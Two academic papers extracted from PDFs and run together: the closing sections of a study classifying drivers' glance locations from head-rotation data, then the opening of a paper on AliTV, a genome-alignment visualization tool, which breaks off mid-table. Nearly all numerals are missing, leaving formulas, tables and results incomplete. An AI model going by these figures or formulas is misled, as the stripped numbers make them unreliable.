fast for evaluation. the basic parameters that require tuning here are the number of hidden layers and the number of neurons in each layer. hidden markov models (hmms) (rabiner & juang, ) are employed to test how much of the classification signal lies in the temporal structure of the data. sequences of head rotation and glance duration features are fed to the classifier, which then infers a single class label for the sequence of samples. glance duration features are computed from glance allocations as the timestamp difference between adjacent glances in time and inform the classifier about how long each glance is (see muñoz et al., for further details). as in the classical approach, one hmm is built from data from each class (glance location). the class label of an unobserved sequence is then determined by finding the hmm and its corresponding class that maximizes the log probability of the test sequence. practically speaking, the only elemental parameter of an hmm is the number of hidden states used to model the temporal data. muñoz et al. 
( ) provides additional detail as to how the parameters for each model were set. model performance measures generally, a sample corresponds to a single -tuple of x,y , and z rotations. this is the case for all classifiers except the hmm, which understands a sample as a sequence (in time) of these tuples. for the purpose of this study, these tuples we grouped according to subject, task, and glance location, ordered according to increasing time, and labeled with the label of the glance location used in the grouping. classification then proceeded as in muñoz et al. ( ). to assess performances of the classifiers, the following three performance measures were used in a binary classification framework (center stack vs. forward roadway, and center stack vs. right mirror). the reason for introducing multiple measures at this stage is to get a fair estimate of classifier performance in light of heavily skewed classes in the dataset (i.e., glances to the forward roadway have a much higher presence in the data than any other class): . classification accuracy (ac) (e.g., sokolova & lapalme, ): the percentage of correctly classified samples (or sample sequences for the hmm classifier): classification accuracy= number of correctly labeled samples total number of samples . f -score (fs) (e.g., sokolova & lapalme, ): a measure of how well the classifier was able to distinguish between classes given an unbalanced dataset. f score= ×(positive predictive value×sensitivity) positive predictive value+sensitivity positive predictive value= number of true positives number of true positives+number of false positives lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. sensitivity= number of true positives number of true positives+number of false negatives . cohen’s kappa statistic (kp) (e.g., carletta, ): a measure indicating how well a classifier agrees with a perfect predictor (higher values indicate high agreement). cohen’s kappa= p (a)−p(e) −p(e) p(a) = relative observed agreement between model and perfect predictor (i.e., accuracy) p(e)= probablity of chance agreement between model and perfect predictor. results to answer the key questions outlined: (a) pca was applied to the driving data (see ‘test trials’ and ‘model performance measures’) as a method of quantifying the contributions of each head angle (x, y and z) in their ability to discriminate between glance locations (this study looks at forward vs. center stack, center stack vs. right mirror), (b) several predictive models (‘model development’) were tested (‘model performance measures’) for predicting glance location based on head position while driving and their accuracies compared, and (c) individual differences in head-glance correspondence during driving were addressed. principal component analysis the input to the pca stage are the filtered x, y and z rotation variables. no additional signal filtering was applied beyond the original butterworth filter used by the vtti in the creation of the dataset. pca was used to reinterpret the x, y and z filtered rotation variables along two independent (orthogonal) axes, i.e., the first two principal components. figure a interprets the dynamic -class data (center stack vs. forward) as pca scores. each point on the graph corresponds to a single sample from the original dataset, irrespective of participant or task (but limited to glances to the center stack and forward roadway). 
each axis of the graph corresponds to the noted principal component and illustrates the statistical behavior of the data along that component. although the input data were standardized per participant, the values plotted have been de-normalized to aid interpretation: they therefore have magnitudes in the range of actual rotations. figures a and a show the data along only the first two components of the pca decomposition. the distribution of individual data points and their class correspondence in fig. a was compared with the actual principal component values in fig. b to establish an informal overview of which variables are most likely to contribute to the classification effort. a rough clustering of forward glances may be observed in fig. a. this cluster center lies at moderate to high values of principal component (pc ). figure b reveals that pc increases in magnitude with increasing x and y rotation, both of which load highly on this component. in this instance, a linear combination of x and y rotation gives a rough but not clear cut decision boundary between glances to the center stack and glances to the forward roadway. pca lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. − − − pc p c glance location center stack forward (a) . − . − . . . . − . − . . x y z principal component r ot at io n . . value (b) figure principal component analysis (pca) of dynamic data, using head rotation. (a) glances to the center stack and forward roadway. (b) principal components of head rotation x, y and z for all data samples belonging to the center stack and forward roadway class. full-size doi: . /peerjcs. /fig- decomposition reveals that pc , which may be interpreted as a linear mix of x and y rotation, explains . % of the variance of the dataset, while pc explains only . % of the variance. lastly, pc (which due to the high loading factor of z rotation on this component may effectively be interpreted as the measure of the influence of z rotation) contributes only . % of the total variance. the same analysis was made for the center stack vs. right mirror case. figure provides a two-dimensional sample distribution plot as well as the corresponding principal components. figure a shows a nice separation of right mirror points, which are located towards on the bottom right quadrant of the scatter plot. figure b reveals that x and y rotation load highly on pc , i.e., pc increases with increasing x and y rotation, which makes sense intuitively. on the pc axis, the right mirror points are in negative pc space. looking at fig. b, we see that pc increases with increasing y rotation and decreases with decreasing x rotation. likewise, each component accounts for roughly the same amount of variance as in the center stack vs. forward roadway case above. we can therefore conclude that in order to distinguish glances to the forward roadway from glances the right mirror, it (a). suffices to look at x and y rotation, and (b). right mirror points are highly correlated with high y rotation (which loads heavily and positively on pc but negatively on pc ), but only for certain ranges of x rotation (which loads heavily and positively on both pc and pc ). lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. − − pc p c glance location right mirror forward (a) . . − . . − . . − . . . x y z principal component r ot at io n . . . . 
value (b) figure principal component analysis (pca) of dynamic data, using head rotation. (a) glances to the right mirror and forward roadway. (b) principal components of head rotation x,y , and z for all data samples belonging to the center stack and right mirror class. full-size doi: . /peerjcs. /fig- model validation table presents the performance measures for all four classifiers using the two representations of the data (balanced vs. unbalanced) for the forward vs. center stack case. as noted earlier, monte-carlo sampling ( iterations) was applied for deriving training and test sets. using the balanced dataset that removed glance distribution bias during training leads to a higher performance in terms of sensitivity/specificity (f scores all ≥ . ) and prediction quality (kappa all ≥ . ) of each classifier compared to (f scores all ≥ . ) and (kappa all ≥− . ) for the original unbalanced data. the hmm classifies sample sequences corresponding to blocks of data within a subject, task, and glance location group. across all classifier, the relatively strong model performances may indicate that the temporal structure of head rotation features can be potential information source. though all classifiers using the balanced dataset outperform a chance predictor, there is a clear upper bound on how much these features contribute to classification. in addition, other locations within the vehicle were also tested against glances to the forward roadway in order to examine the relationship between classification accuracy and the visual angle of the target. hmm and random forest models, which showed relatively higher accuracy among other classifiers, were selected and tested. table places the previous center stack classification efforts in this context and gives performance measures for the two classifiers with the overall best performance. as expected, a rough correlation between increasing visual angle and classification accuracy may be observed, reaching up lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table performance measures (ac, accuracy; fs, f score; kp, kappa statistic) across all classifiers and class distributions for dynamic data, forward roadway vs. center stack. original dataset balanced dataset ac fs kp ac fs kp k-nearest neighbor . . . . . . random forest . . . . . . multilayer perceptron . . . . . . hidden markov model . . . . . . table performance measures (ac, accuracy; fs, f score; kp, kappa statistic) across class distribu- tions for the random forest and hmm classifiers for dynamic data, forward roadway vs. instrument cluster, vs. left mirror, vs. center stack, vs. right mirror. forward vs. model original dataset balanced dataset ac fs kp ac fs kp instrument cluster random forest . . . . . . instrument cluster hidden markov model . . . . . . left mirror random forest . . . . . . left mirror hidden markov model . . . . . . center stack random forest . . . . . . center stack hidden markov model . . . . . . right mirror random forest . . . . . . right mirror hidden markov model . . . . . . to % classification rate with a balanced dataset. the results may support that head pose data can detect particularly detrimental glances (i.e., high-eccentricity glances) with high accuracy, whereas using head pose data alone does not provide high accuracy to detect low-eccentricity glances. 
individual differences in head-glance correspondence individual differences in head-glance correspondence were also tested. to minimize potential variability from characteristics of tasks, only the radio task (e.g., ‘‘turn the radio on and then off’’), which required glances to the center stack from the dynamic setting, was selected and analyzed. figure illustrates the distribution of participants’ individual y rotation while glancing to the center stack during the radio tasks (there was one subject who did not glance to the center stack and that case was excluded for the subsequent analysis). as can be observed in fig. , a wide range of y rotations exists while glancing to the center stack across the subject pool, with some subjects showing relatively narrow distributions and others showing wide distributions (note that individual dots in fig. visualize corresponding y rotation values while glancing to the center stack). it is also important to observe that the center point of each subject’s distribution varies even they are looking at the same object in space. to further explore the differences in rotation distributions in glances to the center stack in relation to glances to the forward roadway, y rotations were plotted over time while completing the radio task (see fig. ) for an illustrative sample of three subjects. this figure lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. − − − head rotation y s ub je ct id figure comparison of individual distribution of y rotation while glancing to the center stack dur- ing the radio task (note that one participant did not have any glances to the center stack, so this figure only shows participants’ data). full-size doi: . /peerjcs. /fig- visualizes how drivers horizontally rotate (e.g., y rotation) their head while engaging in the radio task and their glance locations over time (differentiated in colors). the top frame of fig. illustrates a profile that has relatively narrow range of y rotation while glancing to the center stack, and (relatively) limited overlap between the ranges of y rotation corresponding to glances to forward and glances to the center stack. the middle frame of fig. illustrates a profile that covers a wider range of y rotation with significant overlap of the two glance locations. finally, the lower frame illustrates a profile with a narrow range of y rotation with a sizable overlap between the glance locations. based on these exploratory findings, it was assumed that individual difference in head-glance correspondence may exist. figure shows subjects on two dimensions: (a) the mean difference of y rotation between glances to forward and to the center stack, and (b) the range of y rotation (i.e., distribution width of rotation y while glancing to the center stack). the result showed that the two dimensions were positively correlated, r( )= . , p < . , indicating that subjects who showed wider ranges of horizontal head rotations tended to have higher mean differences of rotation y while glancing to forward and the center stack. for example, subjects and showed relatively narrow ranges of horizontal head rotations (less than degrees) while glancing to the center and their mean rotation angles for glancing to the center stack were relatively close to their mean rotation angles for glancing to forward (the mean differences were . degrees for subject and . degrees for subject ). this may indicate that subjects on the left-bottom area in lee et al. ( ), peerj comput. 
sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure illustration of three subjects’ y rotation ((a) subject , (b) subject , and (c) subject ) over time during dynamic radio tasks (note: line color represents glance locations). full-size doi: . /peerjcs. /fig- fig. such as subject and (i.e., narrow width and small mean difference) moved their head less actively to glance to the center stack, whereas subjects on the right-top are actively moved their head to glance to the center stack location. discussion this analysis investigated the relationship between head rotation and glance behavior during on-road driving. various machine learning techniques were employed to examine the predictive value of head rotation for glance location at an individual level. in this particular example, we used pca not specifically as a data reduction method (we only had three variables to begin with), but as a method to assess variable importance in the classification. we could clearly see how variances in x and y rotation spread heavily across lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. mean difference of rotation y between glances to forward and to the center stack d is tri bu tio n w id th o f r ot at io n y w hi le g la nc in g to th e ce nt er s ta ck figure drivers’ head angle profiles while glancing to the center stack during the radio tasks (note: numbers represent subject id). full-size doi: . /peerjcs. /fig- the first two components, i.e., in order to distinguish right mirror from forward glances it suffices to use a linear decision boundary on the first two components (this is evident from fig. ). that is, both vertical and horizontal head rotations are key variables to classify glance locations in this scenario, as expected. in a more general case, especially when the input data is highly dimensional, the outcome from pca can inform what features to move forward with in any subsequent classification or regression task. for this particular scenario, it provides a step-up from working with the raw rotation values in two ways: . pca provides an accurate d representation of this three dimensional problem, ironing out any inherent correlations between the x,y ,z rotation variables in the process. . by demonstrating to what extent each rotation variable loads on each axis of this representation, and knowing beforehand how the samples in this representation map to glance locations (classes) in our classification framework, it can be easily shown which rotations or combinations thereof are likely to be of most help for a classifier trained to discriminate between these classes. a total of four classifiers from a wide range of data interpretation techniques were used to detect patterns in head rotation data. both unbalanced raw data, which included more cases of glancing forward than glancing to the center stack, and balanced data were tested. substantial performance gains were observed when using the balanced training dataset. for the forward roadway vs. center stack case, hidden markov models performed the best with an accuracy of %. when comparing this number to the remaining accuracy values it should be remembered that different ratios are expressed—hmms work with sequences of point samples as inputs, while the remaining classifiers work with point lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. 
/fig- http://dx.doi.org/ . /peerj-cs. samples directly. all of the modeling approaches provided results that were well in excess of chance findings, suggesting that head rotation data is a fairly robust predictive signal. given that the limited number of glances to non-forward locations (i.e., glances to the center stack accounted for less than % of the total glances recorded) were captured during short/simple secondary tasks, model performance may be best considered as relative lower bound on the possible predictive quality for driver gaze detection. this study also looked at the variability in classification accuracy with increasing visual angles to show a significant correlation between the accuracy and visual angles. there may be multiple factors that influence drivers’ head-glance correspondence such as: (a) road environment (e.g., highway driving vs. rural driving), (b) secondary-task characteristics (e.g., tasks require long off-road glances from drivers vs. tasks require short off-road glances), (c) individual strategies for interacting with secondary tasks (e.g., fixing a head to forward while glancing to the center stack), and (d) physical constraints. for this reason, we analyzed only one type of the secondary tasks (i.e., the radio task) for testing individual differences (note that only this analysis subsampled data for one task and other analyses used the entire dataset including all tasks). the result showed that individual differences in head-glance correspondence may exist. it is well known that owls have to turn their entire head to change views as their eyes are fixed in their sockets, whereas some lizards (such as chameleons) have very large angles of eye movement. we also found lizard type drivers (e.g., subject and in fig. ) and owl type drivers (e.g., subject and in fig. ), and it was expected that head pose data could predict glance regions with higher accuracy for the owl type drivers who actively move heads while glancing away from the road. this result suggests the need for a user-specific model (e.g., training a classifier for each individual to detect glances away from the road by using head rotation) or additional input features (i.e., other facial features or pupil location) to increase model performance, especially for the lizard type drivers (who barely move their head while glancing away from the road). also, predictive power of head rotation data for specific types of glances, such as longer off-road glances which have been linked to greater risk of collision (victor et al., ), needs to be considered further. furthermore, efforts should assess the predictive power of head rotation data for certain types of glances such as those that are of longer duration, which have been linked to greater risk of collision (victor et al., ). one limitation of this work was that the analysis was only applied to the meidated and reduced data, given the fact that the present study conducted a secondary analysis of a subset of the original data. therefore, it should be acknowledged that these findings might not be extrapolated to other circumstances such as a situation where estimation of head orientation is extremely challenging. also, the present work focused on visual angle and classification accuracy between two objects, and individual differences in head and glance correspondence, regardless of task. however, as a previous study (land & tatler, ) revealed, drivers’ head movement and rotation pattern can be task-specific (e.g., racing). 
therefore, further studies which expend to task characteristics (both primary and secondary tasks), will need to be undertaken for a deeper understanding of drivers’ head and glance correspondence. lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclusion the present study investigated head pose data to test the feasibility of using head pose to predict glance location, and served as an exploratory base for developing approaches to building semi-automated glance annotation systems (fridman et al., a; fridman et al., b). this study also systematically tested factors that may affect model performance (e.g., data structure, visual angles between two glance locations, and individual differences in head-glance correspondence). this study achieved fairly accurate classification performance (e.g., classifying glances to forward vs. glances to the center stack), and supports the feasibility of detecting drivers’ glances away from the road by not using eye-tracking data. especially, head pose data accurately classified glances to farther regions (i.e., high-eccentricity glances) from the center forward region. it can therefore be assumed that although classification accuracy for low-eccentricity glances is lower compared to the accuracy of high-eccentricity glances, the most detrimental glance regions (such as a center stack where the most current infotainment system are installed) can be detected by using head pose data. this work suggests that individual differences in head-glance correspondence may be separated into two classes and stimulated follow-on work that has been developed in fridman et al. ( b). however, from the data that is available, it is not clear if an individual can be ‘‘assigned’’ to one of the two classes (i.e., ‘‘owl’’ or ‘‘lizard’’), or if there are more factors such as roadway conditions, secondary type interacting with some individual propensity for certain movement patterns. this study used manually coded on-road data, which are relatively more valid and reliable than automatically tracked eye/head data from a driving simulator. overall, this work suggests that head rotation data, a feature that may be recorded in the vehicle with limited sophistication using commercially available sensors, may provide a potentially lower cost and higher quality estimate of attention allocation than eye tracking data. head movements may be used to fairly reliably predict safety critical off-road glances to regions in the vehicle frequently associated with in-vehicle distractions. acknowledgements an earlier paper covering a portion of this work (muñoz et al., ) appeared in the proceedings of the th international driving symposium on human factors in driver assessment, training, and vehicle design. authors would like to acknowledge the contribution of shannon roberts who provided valuable comments on this manuscript. additional information and declarations funding support for this work was provided by the us dot’s region i new england university transportation center at mit, the santos family foundation and the toyota class action settlement safety research and education program. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
grant disclosures the following grant information was disclosed by the authors: us dot’s region i new england university transportation center at mit. the santos family foundation. toyota class action settlement safety research and education program. competing interests trent victor is an employee of volvo cars and safer vehicle and traffic safety center. author contributions • joonbum lee analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • mauricio muñoz analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • lex fridman analyzed the data, wrote the paper, performed the computation work, reviewed drafts of the paper. • trent victor, bryan reimer and bruce mehler wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data has been supplied as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ahlstrom c, victor t, wege c, steinmetz e. . processing of eye/head-tracking data in large-scale naturalistic driving data sets. ieee transactions on intelligent transportation systems ( ): – doi . /tits. . . breiman l. . random forest. machine learning ( ): – doi . /a: . carletta j. . assessing agreement on classification tasks: the kappa statistic. compu- tational linguistics ( ): – . driver focus-telematics working group. . statement of principles, criteria, and verification procedures on driver-interactions with advanced in-vehicle information and communication systems. washington, d.c.: alliance of automobile manufactures. fridman l, langhans p, lee j, reimer b. a. driver gaze region estimation without use of eye movement. ieee intelligent systems ( ): – . fridman l, lee j, reimer b, victor t. b. ‘owl’and ‘lizard’: patterns of head pose and eye pose in driver gaze classification. iet computer vision ( ): – doi . /iet-cvi. . . lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /a: http://dx.doi.org/ . /iet-cvi. . http://dx.doi.org/ . /peerj-cs. gee a, cipolla r. . determining the gaze of faces in images. image and vision computing ( ): – doi . / - ( ) - . horprasert t, yacoob y, davis ls. . computing -d head orientation from a monocular image sequence. in: proceedings of the second international conference on automatic face and gesture recognition, – . jolliffe i. . principal component analysis. hoboken: john wiley & sons, ltd. land mf, tatler bw. . steering with the head: the visual strategy of a racing driver. current biology : – doi . /s - ( ) - . li n, busso c. . detecting drivers’ mirror-checking actions and its application to maneuver and secondary task recognition. ieee transactions on intelligent transportation systems ( ): – doi . /tits. . . liang y, lee jd, yekhshatyan l. . how dangerous is looking away from the road? algorithms predict crash risk from glance patterns in naturalistic driving. human factors: the journal of the human factors and ergonomics society ( ): – . matlab. . 
statistics and machine learning toolbox. natick: the mathworks, inc. available at https://www.mathworks.com/products/statistics.html. muñoz m, lee j, reimer b, mehler b, victor t. . analysis of drivers’ head and eye movement correspondence: predicting drivers’ glance location using head rotation data. in: proceedings of the th international driving symposium on human factors in driver assessment, training, and vehicle design. snowbird, ut. muñoz m, reimer b, lee j, mehler b, fridman l. . distinguishing patterns in drivers’ visual attention allocation using hidden markov models. transportation research part f: traffic psychology and behaviour : – doi . /j.trf. . . . murphy-chutorian e, trivedi mm. . head pose estimation in computer vi- sion: a survey. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . national highway traffic safety administration. . distracted driving. available at https://www.nhtsa.gov/risky-driving/distracted-driving (accessed on ). rabiner l, juang bh. . an introduction to hidden markov models. aasp magazine, ieee ( ): – doi . /massp. . . sodhi m, reimer b, llamazares i. . glance analysis of driver eye movements to evaluate distraction. behavior research methods, instruments, & computers ( ): – doi . /bf . sokolova m, lapalme g. . a systematic analysis of performance measures for classification tasks. information processing & management ( ): – doi . /j.ipm. . . . statistic brain. . car crash fatality statistics . available at https://www. statisticbrain.com/car-crash-fatality-statistics- / (accessed on ). talamonti wj, huang w, tijerina l, kochhar d. . eye glance and head turn correspondence during secondary task performance in simulator driving. in: proceedings of the human factors and ergonomics society annual meeting, – . lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /tits. . https://www.mathworks.com/products/statistics.html http://dx.doi.org/ . /j.trf. . . http://dx.doi.org/ . /tpami. . https://www.nhtsa.gov/risky-driving/distracted-driving http://dx.doi.org/ . /massp. . http://dx.doi.org/ . /bf http://dx.doi.org/ . /j.ipm. . . https://www.statisticbrain.com/car-crash-fatality-statistics- / https://www.statisticbrain.com/car-crash-fatality-statistics- / http://dx.doi.org/ . /peerj-cs. available at http://pro.sagepub.com/lookup/doi/ . / (accessed on april ). talamonti wj, kochhar d, tijerina l. . eye glance and head turn correspondence during secondary task performance in simulator driving. in: proceedings of the human factors and ergonomics society annual meeting, – . tawari a, chen kh, trivedi mm. . where is the driver looking: analysis of head, eye and iris for robust gaze zone estimation. in: intelligent transportation systems (itsc), ieee th international conference on. piscataway: ieee, – . transportation research board. . the nd strategic highway research program naturalistic driving study dataset. available at https://insight.shrp nds.us. vicente f, huang z, xiong x, de la torre f, zhang w, levi d. . driver gaze tracking and eyes off the road detection system. ieee transactions on intelligent transportation systems ( ): – doi . /tits. . . victor tw, dozza m, bärgman j, boda c-n, engström j, flannagan c, lee jd, markkula g. . analysis of naturalistic driving study data: safer glances, driver inattention, and crash risk. no. shrp report s -s a-rw- . transportation research board, washington, d.c. 
wang y, reimer b, dobres j, mehler b. . the sensitivity of different methodologies for characterizing drivers’ gaze concentration under increased covnitive demand. transportation research part f: traffic psychology and behaviour : – doi . /j.trf. . . . wierwille ww. . visual and manual demands of in-car controls and displays. in: automotive ergonomics. london: taylor and francis, – . lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://pro.sagepub.com/lookup/doi/ . / https://insight.shrp nds.us http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /j.trf. . . http://dx.doi.org/ . /peerj-cs. submitted april accepted april published june corresponding author frank förster, frank.foerster@uni-wuerzburg.de, foersterfrank@gmx.de academic editor shawn gomez additional information and declarations can be found on page doi . /peerj-cs. copyright ankenbrand et al. distributed under creative commons cc-by . open access alitv—interactive visualization of whole genome comparisons markus j. ankenbrand ,*, sonja hohlfeld , ,*, thomas hackl , and frank förster , department of animal ecology and tropical biology, julius maximilian university, würzburg, germany department for bioinformatics, julius maximilian university, würzburg, germany department of civil and environmental engineering, massachusetts institute of technology, cambridge, ma, usa center for computational and theoretical biology, julius maximilian university, würzburg, germany * these authors contributed equally to this work. abstract whole genome alignments and comparative analysis are key methods in the quest of unraveling the dynamics of genome evolution. interactive visualization and exploration of the generated alignments, annotations, and phylogenetic data are important steps in the interpretation of the initial results. limitations of existing software inspired us to develop our new tool alitv, which provides interactive visualization of whole genome alignments. alitv reads multiple whole genome alignments or automatically generates alignments from the provided data. optional feature annotations and phylo- genetic information are supported. the user-friendly, web-browser based and highly customizable interface allows rapid exploration and manipulation of the visualized data as well as the export of publication-ready high-quality figures. alitv is freely available at https://github.com/alitvteam/alitv. subjects bioinformatics, computational biology keywords comparative genomics, alignment, visualization introduction advances in short- and long-read sequencing and assembly over the last decade (salzberg et al., ; chin et al., ; hackl et al., ) have made whole genome sequencing a routine task for biologists in various fields. public sequence databases already contain several thousand of draft and finished genomes (benson et al., ), with many more on the way (pagani et al., ). in particular, high throughput sequencing projects of pathogen strains related to recent outbreaks (rasko et al., ), and large-scale ecological studies targeting microbial communities and pan genomes of populations using metagenome and single cell sequencing approaches contribute in this process (turnbaugh et al., ; kashtan et al., ). 
these rich data sets can be explored for large-scale evolutionary processes using comparative genomics and whole genome alignments, revealing genomic recombinations (didelot, méric & falush, ; namouchi et al., ; yahara et al., ), islands and horizontal gene transfer (avrani et al., ; coleman et al., ; langille, hsiao & brinkman, ) as well as the often related dynamics of mobile or endogenous viral elements (fischer, ; touchon & rocha, ). other applications of whole genome how to cite this article ankenbrand et al. ( ), alitv—interactive visualization of whole genome comparisons. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:frank.foerster@uni-wuerzburg.de mailto:frank.foerster@uni-wuerzburg.de mailto:foersterfrank@gmx.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://github.com/alitvteam/alitv http://dx.doi.org/ . /peerj-cs. comparisons include the analysis of paleopolyploidization events (vanneste et al., ) and quantitative measurements of intra-tumour heterogeneity (schwarz et al., ). however, to facilitate proper interpretation of the obtained whole genome comparisons, visualization is key. one of the first tools to provide an interactive graphical representation of aligned genomes is the multiple whole genome alignment program mauve (darling et al., ). mauve represents genomes in a co-linear layout with homologous syntenic blocks indicated by colors and connecting lines. the interactive stand-alone viewer act (carver et al., ), in addition to alignment blocks, supports the representation of genomic annotations, such as genes. the r library genoplotr (guy, kultima & andersson, ) and the python based application easyfig (sullivan, petty & beatson, ), both also based on a co-linear layout and supporting feature annotations, lack interactive analysis features as they are designed to generate static figures. in addition to co-linear layouts, tools using circular representations of genomes have been developed. blastatlas (hallin, binnewies & ussery, ) and brig (alikhan et al., ) use multiple concentric rings to represent data of individual genomes, with brig also providing an interactive graphical interface. genomering (herbig et al., ) uses a circular representation as well, however, places all genomes on the same ring and syntenic blocks are connected with arcs extending into the center of the ring. the web-based comparative genomics software sybil (riley et al., ) provides interactive co-linear visualization of multiple whole genome alignments with feature annotations and also supports a phylogenetic tree alongside the alignments. the software builds on a relational chado database schema and, therefore, requires upload and import of custom data sets prior to analysis. during our analysis of existing software, we found that interactive tools are useful for data exploration, but offer limited support for the figure export and at low qualities. scripting-based tools provide higher levels of customization and figure quality, however, require familiarity with the respective language, thus often rendering the generation of figures time-consuming. for web- and database-based suites, such as sybil, the upload and import procedure complicate utilization and limit applicability. 
here we present our stand-alone application alitv (alignment toolbox and visualization) designed for interactive visualization of multiple whole genome alignments. alitv aims to enable researches to either directly read or automatically generate new whole genome alignments, rapidly explore the results, manipulate and customize the visualization and, at the end of the day, export appealing, publication-grade figures. alitv reads sequence and annotation or alignment data in common formats (fasta, genbank, gff, maf, newick, and so on), and internally computes alignments using lastz (harris, ). the user-friendly interface is built on the state-of-the-art d .js javascript framework and can be utilized in a platform independent manner with common web browsers. genomes are represented in a highly customizable co-linear layout including annotations and an optional phylogenetic tree. the tree is not computed by alitv but has to be provided during data generation. also, the order of genomes is not automatically optimized to minimize rearrangements. customizations to the figure by the user can be saved, reloaded, and exported to high quality svg files. ankenbrand et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. methods our tool alitv is divided into two parts. the first non-interactive part is required for the generation of the input files for our interactive viewer. the second part represents that interactive viewer in the form of a svg file embedded in a html website. the latest version of our code can be obtained from github (https://github.com/alitvteam/alitv). it is planned to adjust alitv in order to integrate it into the biojs registry (https: //biojsnet.herokuapp.com/, corpas et al. ( )). the general design of alitv assures, that alitv runs on different hard- and software platforms, e.g., linux, macosx, and windows. the following sections describe those parts in more detail. data preparation the data preparation is performed by a single perl script named alitv.pl. this script uses a set of different perl modules to import incoming data and generate valid json input data for our visualization engine described in the next paragraph. one of our aims is to support as many different input formats for sequence and annotation information as possible. therefore, we used the well tested and broadly accepted bioperl as basis for our modules (stajich et al., ). the script alitv.pl uses a yaml file to specify the different input files. moreover, an easy-to-use-mode is available which requires only a couple of input files and generates the required yaml file on the fly. this generated yaml settings file might be used to reproduce alitv results or can be used as starting point to alter configuration parameters. during the preparation step, alitv requires all-vs-all alignments of the complete sequence set. those alignments are generated or user provided. the current version of alitv.pl requires lastz to generate all alignments in maf format (harris, ). nevertheless, bioperl supports a broad range of alignment formats. therefore, other programs can easily be added to the list of supported alignment programs. moreover, the ability to use existing alignments allows a huge time benefit, when alitv parameters are changed to optimize the visualization via yaml settings file in a non-interactive manner. thus future versions of alitv.pl will support caching of alignments based on checksums to avoid unnecessary recalculations. 
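As a rough illustration of the all-vs-all alignment step that alitv.pl automates, the sketch below shells out to lastz for each ordered pair of genome FASTA files and collects MAF output. This is not alitv.pl itself (which is Perl/BioPerl based and driven by a YAML settings file); the file names are hypothetical, each FASTA is assumed to contain a single sequence, and the lastz options shown are assumed to be available in the installed version.

```python
# Sketch (not alitv.pl) of generating all-vs-all pairwise alignments with lastz in MAF
# format, as described above. Assumes lastz is on PATH and one sequence per FASTA file.
import itertools
import subprocess
from pathlib import Path

def all_vs_all_lastz(fasta_files, out_dir="alignments"):
    out = Path(out_dir)
    out.mkdir(exist_ok=True)
    maf_files = []
    # permutations() yields every ordered target/query pair.
    for target, query in itertools.permutations(fasta_files, 2):
        maf = out / f"{Path(target).stem}_vs_{Path(query).stem}.maf"
        with open(maf, "w") as fh:
            subprocess.run(["lastz", str(target), str(query), "--format=maf"],
                           stdout=fh, check=True)
        maf_files.append(maf)
    return maf_files

# Example with hypothetical file names:
# mafs = all_vs_all_lastz(["olea.fa", "lindenbergia.fa", "nicotiana.fa"])
```

Caching these MAF files between runs, keyed for example on input checksums, is what would make repeated re-parameterization via the YAML settings file cheap, as noted above.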
the final result of our alitv.pl is a json file, which can be load into our interactive visualization page. interactive visualization alitv is implemented in javascript. our code is documented using jsdoc (version . . http://usejsdoc.org/, . . ). alitv generates a svg which is presented within a browser using html . a tutorial is available at https://alitv.readthedocs.io/en/latest/index.html. to gain advanced application possibilities we use different libraries. the javascript library d .js . . (http://d js.org/, . . ) provides a wide range of pre- built functions for calculating and drawing the interactive figure. in addition, alitv employes jquery . . (https://jquery.com/, . . ) to ease access to several parts of the figure. this is helpful for hiding selected sequences, genes or links. jqueryui . . (https://jqueryui.com/, . . ) gives us the possibilities to add user-friendly ankenbrand et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/alitvteam/alitv https://biojsnet.herokuapp.com/ https://biojsnet.herokuapp.com/ http://usejsdoc.org/ https://alitv.readthedocs.io/en/latest/index.html http://d js.org/ https://jquery.com/ https://jqueryui.com/ http://dx.doi.org/ . /peerj-cs. table chloroplast genomes of the parasitic and non-parasitic plants used in the case study. species accession life-style reference olea europaea nc_ non-parasitic messina ( ) lindenbergia philippensis nc_ non-parasitic wicke et al. ( ) cistanche 